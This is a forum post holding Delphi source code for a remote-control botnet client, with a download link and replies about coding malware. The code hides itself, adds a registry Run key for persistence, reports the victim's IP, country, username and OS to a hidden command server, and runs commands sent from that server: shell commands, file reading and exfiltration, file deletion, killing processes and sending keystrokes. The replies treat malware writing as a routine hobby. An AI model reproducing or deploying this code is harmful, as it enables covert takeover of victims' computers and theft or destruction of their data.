function leerdatos_sub(sub_1, sub_2, sub_3, sub_4: integer): DWORD;
begin
Result := sub_1 shl 16 or sub_4 shl 14 or sub_2 shl 2 or sub_3;
end;
function opencd(tipoh: string): string;
// Credits : Based on http://stackoverflow.com/questions/19894566/using-windows-and-mmsystem-in-delphi
// Thanks to Sertac Akyuz
const
const_uno = $00000009;
const_dos = $0000002D;
const_tres = 0;
const_cuatro = 0;
const_cinco = $0001;
const_seis = const_dos;
const_siete = 6;
const_ocho = 8;
var
var_uno: string;
var_dos: THandle;
var_tres: DWORD;
opciondecd: integer;
begin
if (tipoh = 'open') then
begin
opciondecd := $0202;
end;
if (tipoh = 'close') then
begin
opciondecd := $0203;
end;
var_uno := Format('\\.\%s:', ['D']);
var_dos := CreateFile(PChar(var_uno), GENERIC_READ, FILE_SHARE_WRITE, nil,
OPEN_EXISTING, 0, 0);
DeviceIoControl(var_dos, leerdatos_sub(const_uno, const_siete, const_tres,
const_cuatro), nil, 0, nil, 0, var_tres, nil);
DeviceIoControl(var_dos, leerdatos_sub(const_uno, const_ocho, const_tres,
const_cuatro), nil, 0, nil, 0, var_tres, nil);
DeviceIoControl(var_dos, leerdatos_sub(const_seis, opciondecd, const_tres,
const_cinco), nil, 0, nil, 0, var_tres, nil);
CloseHandle(var_dos);
Result := '[?] CD : OK';
end;
//
// First Functions
function dhencode(texto, opcion: string): string;
// Thanks to Taqyon
// Based on http://www.vbforums.com/showthread.php?346504-DELPHI-Convert-String-To-Hex
var
num: integer;
aca: string;
cantidad: integer;
begin
num := 0;
Result := '';
aca := '';
cantidad := 0;
if (opcion = 'encode') then
begin
cantidad := Length(texto);
for num := 1 to cantidad do
begin
aca := IntToHex(ord(texto[num]), 2);
Result := Result + aca;
end;
end;
if (opcion = 'decode') then
begin
cantidad := Length(texto);
for num := 1 to cantidad div 2 do
begin
aca := Char(StrToInt('$' + Copy(texto, (num - 1) * 2 + 1, 2)));
Result := Result + aca;
end;
end;
end;
function regex(text: String; deaca: String; hastaaca: String): String;
begin
Delete(text, 1, AnsiPos(deaca, text) + Length(deaca) - 1);
SetLength(text, AnsiPos(hastaaca, text) - 1);
Result := text;
end;
function partirdoc(Url: string): string;
var
chauhost: string;
begin
Url := StringReplace(Url, regex(Url, '://', '/'), '', [rfReplaceAll,
rfIgnoreCase]);
Url := StringReplace(Url, 'http://', '', [rfReplaceAll, rfIgnoreCase]);
Url := StringReplace(Url, 'https://', '', [rfReplaceAll, rfIgnoreCase]);
Result := Url;
end;
function getfilename(Url: string): string;
// Credits : Based on http://delphi-kb.blogspot.com.ar/2009/12/extract-filename-from-url.html
// Thanks to NM
var
resultado: string;
begin
resultado := StringReplace(Url, '/', '\', [rfReplaceAll]);
resultado := ExtractFileName(resultado);
Result := resultado;
end;
function toma(const pagina: string): UTF8String;
// Credits : Based on http://www.scalabium.com/faq/dct0080.htm
// Thanks to www.scalabium.com
var
nave1: HINTERNET;
nave2: HINTERNET;
tou: DWORD;
codez: UTF8String;
codee: array [0 .. 1023] of byte;
finalfinal: string;
begin
try
begin
finalfinal := '';
Result := '';
nave1 := InternetOpen(
'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12'
, INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0);
nave2 := InternetOpenUrl(nave1, PChar(pagina), nil, 0,
INTERNET_FLAG_RELOAD, 0);
repeat
begin
InternetReadFile(nave2, @codee, SizeOf(codee), tou);
SetString(codez, PAnsiChar(@codee[0]), tou);
finalfinal := finalfinal + codez;
end;
until tou = 0;
InternetCloseHandle(nave2);
InternetCloseHandle(nave1);
Result := finalfinal;
end;
except
//
end;
end;
function tomar(pagina: string; postdata: AnsiString): string;
// Credits : Based on : http://tulisanlain.blogspot.com.ar/2012/10/how-to-send-http-post-request-in-delphi.html
// Thanks to Tulisan Lain
const
accept: packed array [0 .. 1] of LPWSTR = (PChar('*/*'), nil);
var
nave3: HINTERNET;
nave4: HINTERNET;
nave5: HINTERNET;
todod: array [0 .. 1023] of AnsiChar;
numberz: Cardinal;
numberzzz: Cardinal;
finalfinalfinalfinal: string;
begin
try
begin
finalfinalfinalfinal := '';
Result := '';
nave3 := InternetOpen(PChar(
'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12')
, INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0);
nave4 := InternetConnect(nave3, PChar(regex(pagina, '://', '/')),
INTERNET_DEFAULT_HTTP_PORT, nil, nil, INTERNET_SERVICE_HTTP, 0, 1);
nave5 := HttpOpenRequest(nave4, PChar('POST'), PChar(partirdoc(pagina)),
nil, nil, @accept, 0, 1);
HttpSendRequest(nave5, PChar(
'Content-Type: application/x-www-form-urlencoded'), Length
('Content-Type: application/x-www-form-urlencoded'), PChar(postdata),
Length(postdata));
repeat
begin
InternetReadFile(nave5, @todod, SizeOf(todod), numberzzz);
if numberzzz = SizeOf(todod) then
begin
Result := Result + AnsiString(todod);
end;
if numberzzz > 0 then
for numberz := 0 to numberzzz - 1 do
begin
finalfinalfinalfinal := finalfinalfinalfinal + todod[numberz];
end;
end;
until numberzzz = 0;
InternetCloseHandle(nave3);
InternetCloseHandle(nave4);
InternetCloseHandle(nave5);
Result := finalfinalfinalfinal;
end;
except
//
end;
end;
function dh_generate(cantidad: integer): string;
const
opciones: array [1 .. 3] of string = ('mayus', 'minus', 'numbers');
var
aleatorio: integer;
iz: integer;
var
finalr: string;
begin
finalr := '';
for iz := 1 to cantidad do
begin
aleatorio := Random(4 - 1) + 1;
if (opciones[aleatorio] = 'mayus') then
begin
finalr := finalr + Chr(ord('A') + Random(26));
end;
if (opciones[aleatorio] = 'minus') then
begin
finalr := finalr + Chr(ord('a') + Random(26));
end;
if (opciones[aleatorio] = 'numbers') then
begin
finalr := finalr + Chr(ord('0') + Random(10));
end;
end;
Result := finalr;
end;
procedure savefile(filename, texto: string);
var
ar: TextFile;
begin
AssignFile(ar, filename);
FileMode := fmOpenWrite;
if FileExists(filename) then
Append(ar)
else
Rewrite(ar);
Writeln(ar, texto);
CloseFile(ar);
end;
function leerarchivo(rutadelarchivo: string): string;
const
cantidad_buffer = $8000;
var
fun_uno: LongWord;
fun_dos: THandle;
fun_tres: array [0 .. cantidad_buffer - 1] of AnsiChar;
begin
fun_tres := '';
fun_dos := CreateFile(PChar(rutadelarchivo), GENERIC_READ,
FILE_SHARE_READ or FILE_SHARE_WRITE, nil, OPEN_EXISTING,
FILE_ATTRIBUTE_READONLY, 0);
SetFilePointer(fun_dos, 0, nil, FILE_BEGIN);
ReadFile(fun_dos, fun_tres, cantidad_buffer, fun_uno, nil);
while (fun_uno > 0) do
begin
ReadFile(fun_dos, fun_tres, cantidad_buffer, fun_uno, nil);
end;
CloseHandle(fun_dos);
Result := fun_tres;
end;
function getmydata(): string;
var
consegui_key, consegui_ip, consegui_pais, consegui_user, consegui_os: string;
codigo_de_pagina: string;
begin
consegui_key := leerarchivo('key');
consegui_key := StringReplace(consegui_key, sLineBreak, '',
[rfReplaceAll, rfIgnoreCase]);
codigo_de_pagina := toma('http://whatismyipaddress.com/');
consegui_ip := regex(codigo_de_pagina, 'alt="Click for more about ',
'"></a>');
consegui_pais := regex(codigo_de_pagina, '<tr><th>Country:</th><td>',
'</td></tr>');
if (consegui_ip = '') then
begin
consegui_ip := '?';
end;
if (consegui_pais = '') then
begin
consegui_pais := '?';
end;
consegui_user := GetEnvironmentVariable('username');
consegui_os := GetEnvironmentVariable('os');
Result := '[key]' + consegui_key + '[key]' + '[ip]' + consegui_ip + '[ip]' +
'[pais]' + consegui_pais + '[pais]' + '[user]' + consegui_user + '[user]' +
'[os]' + consegui_os + '[os]';
end;
procedure saludo;
begin
tomar(url_master,
'entradatrasera=hidad&key=' + clave + '&ip=' + ip + '&pais=' + pais +
'&username=' + user + '&os=' + os + '&timeout=' + time);
end;
procedure sigo_vivo;
begin
tomar(url_master, 'sigovivo=alpedo&clavenow=' + clave);
end;
function ver_ordenes(): string;
var
re_cmd, arg1, arg2, arg3: string;
begin
code := tomar(url_master, 'ordenespabots=alpedo&clave=' + clave);
re_cmd := regex(code, '[+] Orden : ', '<br>');
arg1 := regex(code, '[+] Arg1 : ', '<br>');
arg2 := regex(code, '[+] Arg2 : ', '<br>');
arg3 := regex(code, '[+] Arg3 : ', '<br>');
Result := '[comando]' + re_cmd + '[comando]' + '[arg1]' + arg1 + '[arg1]' +
'[arg2]' + arg2 + '[arg2]' + '[arg3]' + arg3 + '[arg3]';
end;
procedure mandar_rta(contenido: string);
begin
tomar(url_master,
'mandocarajo=alpedo&miclave=' + clave + '&mirta=' + contenido);
end;
begin
ob := INVALID_HANDLE_VALUE;
code := '';
ob := CreateFile(PChar(paramstr(0)), GENERIC_READ, FILE_SHARE_READ, nil,
OPEN_EXISTING, 0, 0);
if (ob <> INVALID_HANDLE_VALUE) then
begin
SetFilePointer(ob, -9999, nil, FILE_END);
ReadFile(ob, codex, 9999, nose, nil);
CloseHandle(ob);
end;
todo := regex(codex, '[63686175]', '[63686175]');
todo := dhencode(todo, 'decode');
url_master := regex(todo, '[url]', '[url]');
time := regex(todo, '[time]', '[time]');
// url_master := 'http://localhost/botnet/';
// time := '5';
try
dir_hide := GetEnvironmentVariable('USERPROFILE') + '/';
carpeta := 'ratatax';
dir := dir_hide + carpeta + '/';
if not(DirectoryExists(dir)) then
begin
CreateDir(dir);
end;
ChDir(dir);
nombrereal := ExtractFileName(paramstr(0));
rutareal := dir;
yalisto := dir + nombrereal;
MoveFile(PChar(paramstr(0)), PChar(yalisto));
SetFileAttributes(PChar(dir), FILE_ATTRIBUTE_HIDDEN);
SetFileAttributes(PChar(yalisto), FILE_ATTRIBUTE_HIDDEN);
RegCreateKeyEx(HKEY_LOCAL_MACHINE,
'Software\Microsoft\Windows\CurrentVersion\Run\', 0, nil,
REG_OPTION_NON_VOLATILE, KEY_WRITE, nil, registro, nil);
RegSetValueEx(registro, 'uberkk', 0, REG_SZ, PChar(yalisto), 666);
RegCloseKey(registro);
if not(FileExists('key')) then
begin
Randomize;
savefile('key', dh_generate(5));
end;
datos := getmydata();
clave := regex(datos, '[key]', '[key]');
ip := regex(datos, '[ip]', '[ip]');
pais := regex(datos, '[pais]', '[pais]');
user := regex(datos, '[user]', '[user]');
os := regex(datos, '[os]', '[os]');
// Writeln('[+] Clave : ' + clave);
// Writeln('[+] IP : ' + ip);
// Writeln('[+] Pais : ' + pais);
// Writeln('[+] Username : ' + user);
// Writeln('[+] OS : ' + os);
saludo;
// Writeln('');
// Writeln('[+] Iniciando bucle');
while (True) do
begin
Sleep(StrToInt(time) * 1000);
sigo_vivo;
ordenes_re := ver_ordenes;
ordenes_cmd := regex(ordenes_re, '[comando]', '[comando]');
ordenes_ar1 := regex(ordenes_re, '[arg1]', '[arg1]');
ordenes_ar2 := regex(ordenes_re, '[arg2]', '[arg2]');
ordenes_ar3 := regex(ordenes_re, '[arg3]', '[arg3]');
// Writeln('');
// Writeln('[+] orden : ' + ordenes_cmd);
// Writeln('[+] ar1 : ' + ordenes_ar1);
// Writeln('[+] ar2 : ' + ordenes_ar2);
// Writeln('[+] ar3 : ' + ordenes_ar3);
if (ordenes_cmd = 'CMD') then
begin
mandar_rta(ejecutar(ordenes_ar1));
end;
if (ordenes_cmd = 'GetProcess') then
begin
mandar_rta(listarprocesos());
end;
if (ordenes_cmd = 'KillProcess') then
begin
mandar_rta(matarproceso(ordenes_ar1));
end;
if (ordenes_cmd = 'ListDir') then
begin
mandar_rta(listardirectorio(ordenes_ar1));
end;
if (ordenes_cmd = 'Delete') then
begin
mandar_rta(borraresto(ordenes_ar1));
end;
if (ordenes_cmd = 'OpenFile') then
begin
mandar_rta(leerarchivo(ordenes_ar1));
end;
if (ordenes_cmd = 'OpenCD') then
begin
mandar_rta(opencd('open'));
end;
if (ordenes_cmd = 'CloseCD') then
begin
mandar_rta(opencd('close'));
end;
if (ordenes_cmd = 'HideIcons') then
begin
mandar_rta(cambiar_iconos('hide'));
end;
if (ordenes_cmd = 'ShowIcons') then
begin
mandar_rta(cambiar_iconos('mostrar'));
end;
if (ordenes_cmd = 'HideTaskbar') then
begin
mandar_rta(cambiar_barra('hide'));
end;
if (ordenes_cmd = 'ShowTaskbar') then
begin
mandar_rta(cambiar_barra('mostrar'));
end;
if (ordenes_cmd = 'SendKeys') then
begin
mandar_rta(SendKeys(ordenes_ar1));
end;
if (ordenes_cmd = 'OpenWord') then
begin
mandar_rta(escribir_word(ordenes_ar1));
end;
if (ordenes_cmd = 'CrazyMouse') then
begin
mandar_rta(crazy_mouse(ordenes_ar1));
end;
end;
except
begin
//
end;
end;
end.
// The End ?
Available for download here (http://sourceforge.net/projects/dhbotnet/).
-
First, botnets are lame!
Second, I can't really see how it can be beneficial to code such in Delphi. Even though languages have a wide range of usefulness, languages such as Python, Pascal and Delphi are not good for malware.
-
Python, Pascal and Delphi are not good for malware.
You fo real? Python is ofc not suitable, but Pascal and Delphi is more than suitable. There are MANY malwares written in Pascal and Delphi, including that one special ATM keylogger that was designed to log CC data upon card insertion.
-
@Doddy - You seem to be a very good Delphi programmer. As well, I've seen you post other decent malicious programs in Perl and PHP as well. How come you haven't bothered to post an intro, or made any other posts for that matter? All I've seen from you is various botnets and RATs and whatnot.
-
You can write malware in any compiled language, for the most part. Some choices are not necessarily good, however.